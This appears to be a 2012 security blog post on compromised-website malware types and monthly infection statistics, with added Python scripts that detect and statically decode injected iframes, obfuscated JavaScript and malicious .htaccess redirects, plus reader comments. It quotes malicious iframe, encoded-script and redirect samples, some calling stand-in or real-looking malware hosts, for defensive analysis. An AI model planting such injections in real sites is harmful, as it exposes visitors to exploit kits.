When we see a compromised site distributing malware, it is usually done through one of four methods: iframe injection, javascript injection, conditional (.htaccess) redirections or blackhat SEO spam. Those are not the only ways, and they can be encoded or hidden differently inside the site, but the final output on the compromised site is generally one of them:
- Iframe injection: It makes the browser load content from external (and malicious) web sites. Example: <iframe src="http://pokosa.com/tds/go.php?sid=1" ..
- Javascript injection: Used to encode (hide) calls to iframes or additional remote javascript includes. Example: <script>d= Date ;d=new d();h=-parseInt("012")/5;if(window.document)try{new document.getElementById("qwe")…. (this code redirects users to the Blackhole exploit kit)
- .htaccess (or conditional) redirections: Used to redirect anyone visiting the site from search engines (or with specific user agents / referers) to malware or spam content.
- Blackhat SEO spam: Not really malware in the strict sense of the word (it won't infect anyone visiting the site), but still harmful to the webmaster and to the site's reputation (imagine a corporate site redirecting to an online viagra store).
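The four patterns above, as a small triage script that classifies a fetched page and its .htaccess by the evidence found for each type. This is an added example, not Sucuri's scanner: the first-party host list, the hidden-frame heuristics, the marker threshold and the sample inputs are assumptions or constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed samples (not captured): a hidden off-site iframe, an inline
# script in the shape of the encoded samples in this post, and a
# search-engine-referer redirect of the kind .htaccess infections use.
SAMPLE_HTML = """<p>Welcome</p>
<iframe src="http://evil.invalid/tds/go.php?sid=1" width="1" height="1" style="visibility:hidden"></iframe>
<script>f="fromC"+"harCode";e=window["e"+"val"];s="";w="-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k28k67k60k68k60k69k75k".split("k");for(i=0;i!=5;i+=1){s+=String[f](w[i]*1+41);}e(s);</script>"""
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\. [NC]
RewriteRule ^(.*)$ http://evil.invalid/in.cgi?4 [R=302,L]"""

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN = re.compile(r"""\b(?:width|height)\s*=\s*["']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)
SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
JS_MARKERS = {  # traits the encoded scripts in this post share
    "eval": re.compile(r"\beval\b"),
    "fromCharCode": re.compile(r"fromCharCode"),
    "window-bracket": re.compile(r'window\s*\[\s*"'),
    "numeric-array": re.compile(r"(?:-?\d+(?:\.5)?[a-z~]){20,}"),
}
REWRITE_COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}\s+(\S+)", re.I | re.M)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I | re.M)

def _host(url):
    return (urlparse(url).hostname or "").lower()

def iframe_findings(html, first_party):
    """Iframe sources that point off-site, or whose frame is sized/styled invisible."""
    out = []
    for tag in IFRAME_TAG.findall(html):
        m = SRC_ATTR.search(tag)
        if not m:
            continue
        host = _host(m.group(1))
        if (host and host not in first_party) or HIDDEN.search(tag):
            out.append(m.group(1))
    return out

def normalize_js(body):
    """Fold "e"+"va"+"l" style split strings back together until nothing changes."""
    prev = None
    while prev != body:
        prev, body = body, CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), body)
    return body

def script_findings(html, threshold=2):
    """Inline scripts carrying at least `threshold` of the obfuscation markers."""
    out = []
    for body in SCRIPT_BODY.findall(html):
        norm = normalize_js(body)
        hits = [name for name, rx in JS_MARKERS.items() if rx.search(norm)]
        if len(hits) >= threshold:
            out.append(hits)
    return out

def htaccess_findings(text, first_party):
    """Referer/user-agent conditions paired with a RewriteRule to a foreign host."""
    conds = REWRITE_COND.findall(text)
    targets = [t for t in REWRITE_RULE.findall(text) if _host(t) not in first_party]
    return [(var, pat, t) for var, pat in conds for t in targets]

def classify(html, htaccess, first_party=("example.invalid",)):
    """Map each infection type named in the post to the evidence found for it."""
    report = {"iframe": iframe_findings(html, first_party),
              "javascript": script_findings(html),
              "htaccess": htaccess_findings(htaccess, first_party)}
    return {kind: ev for kind, ev in report.items() if ev}
```

Blackhat SEO spam is left out on purpose: it needs content-level checks (hidden keyword blocks, cloaked pages served only to crawlers) rather than the structural markers used here.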
April / 2012 stats
Last month (April 2012) we scanned a LOT of sites, and many of them (107,616, to be more precise) were compromised. This is the breakdown per infection type:
- Iframe injection: 52.6%
- Javascript injection: 26.5%
- Blackhat SEO spam: 10.1%
- .htaccess redirections: 7.3%
- Other: 3%
Top malware domains per infection type and unique number of compromised sites
Encoded javascript:
Most of the encoded javascript malware we found was being used to redirect visitors to exploit kits (especially Blackhole).
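A static decoder for the encoded-script shape discussed above, added here as an example rather than taken from the post. It reads the delimiter out of `.split("x")` and the offset out of the `w[j]*1+41` or `39+1*w[j]` arithmetic, then recovers the string the script would have handed to eval without executing anything; it generalises over the additive-offset variants but not the "~"-delimited multiplier variant. `make_sample` and `PAYLOAD` are constructed test inputs, not captured malware.

```python
import re

# The two offset shapes in the samples above: w[j]*1+41 and 39+1*w[j].
OFFSET_RE = re.compile(r"\w+\[\w+\]\s*\*\s*1\s*\+\s*(\d+)|(\d+)\s*\+\s*1\s*\*\s*\w+\[\w+\]")
# The delimiter-joined number string and the .split("x") that cuts it.
SPLIT_RE = re.compile(r"""["']([-0-9a-z]+)["'](?:\s*\]\s*\[0\])?\s*\.split\(["']([a-z])["']\)""")
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")

def decode_numeric_array(script):
    """Recover the string the script would hand to eval, without running it.

    Returns None when the script lacks either the split() number string
    or a recognisable char-code offset, or when the delimiter does not
    cut the string into integers.
    """
    m = SPLIT_RE.search(script)
    o = OFFSET_RE.search(script)
    if not (m and o):
        return None
    blob, delim = m.group(1), m.group(2)
    offset = int(o.group(1) if o.group(1) is not None else o.group(2))
    try:
        return "".join(chr(int(tok) + offset) for tok in blob.split(delim))
    except ValueError:
        return None

def redirect_targets(script):
    """URLs in the decoded payload, i.e. where the injected frame sends visitors."""
    decoded = decode_numeric_array(script)
    return URL_RE.findall(decoded) if decoded else []

def make_sample(payload, delim="k", offset=41):
    """Constructed test input in the shape of the samples above, not a captured
    script: only the number string and the offset expression the decoder keys on."""
    tokens = delim.join(str(ord(c) - offset) for c in payload)
    return 'f=["%s"][0].split("%s");s=s+r.fromCharCode(w[j]*1+%d);' % (tokens, delim, offset)

# Constructed stand-in for the hidden iframe these scripts write into the page.
PAYLOAD = ("document.write('<iframe src=\"http://evil.invalid/in.cgi?4\" "
           "width=\"10\" height=\"10\" style=\"visibility:hidden\"></iframe>');")
```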
Malware signatures
Even though we can classify web malware into the 4 categories above, we sub-categorize it for our analysis and internal detection. These were the top signatures detected (counted per page, not per site):
6 comments
I had a harsh introduction to the .htaccess redirection malware last month, but your company saved my sites, and I can’t say thank you enough.
Rookie question, but what should we do with the URLs you provide in the article above? Should we block them via .htaccess?
You guys rock. Thanks for doing all the heavy lifting keeping up with malware.
Cheers, Carel.
Thanks for your vigil on malware.
I'm a newbie on this subject. According to an online scan I have an infected site. This is the report: Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwht291
Location: http://storesseeks.in/in.cgi?13
How do I remove it? In the source code of the site they tell me is infected I found neither an iframe nor injected javascript.